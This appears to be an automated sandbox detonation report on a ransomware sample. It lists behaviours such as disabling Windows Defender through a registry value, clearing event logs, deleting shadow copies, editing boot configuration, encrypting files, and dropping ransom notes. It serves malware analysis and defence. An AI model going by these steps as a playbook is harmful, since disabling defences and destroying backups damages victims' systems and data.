Analysis Overview
SHA256
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8
Threat Level: Known bad
The file afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Deletes Windows Defender Definitions
Hive
Modifies Windows Defender Real-time Protection settings
Clears Windows event logs
Modifies boot configuration data using bcdedit
Deletes shadow copies
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Runs net.exe
Runs ping.exe
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 14:34
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 14:34
Reported
2022-01-12 14:39
Platform
win7-en-20211208
Max time kernel
126s
Max time network
133s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\CopySkip.png => C:\Users\Admin\Pictures\CopySkip.png.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CopySkip.png.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExitExport.tif => C:\Users\Admin\Pictures\ExitExport.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExitExport.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PopInitialize.tiff => C:\Users\Admin\Pictures\PopInitialize.tiff.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PopInitialize.tiff.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RequestClear.tif => C:\Users\Admin\Pictures\RequestClear.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RequestClear.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Adak.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Midway.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HTECH_01.MID.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\css\calendar.css | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE_COL.HXC.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.swf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\iedvtool.dll.mui | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15072_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\EnterRename.ppt.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\bod_r.TTF | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Library\EUROTOOL.XLAM.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\UndoPush.pot.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\calendar.html | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\COUPLER.WAV.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WSIDBR98.POC.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveMergeLetter.dotx.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01740_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyReport.dotx.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\F12Tools.dll.mui | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
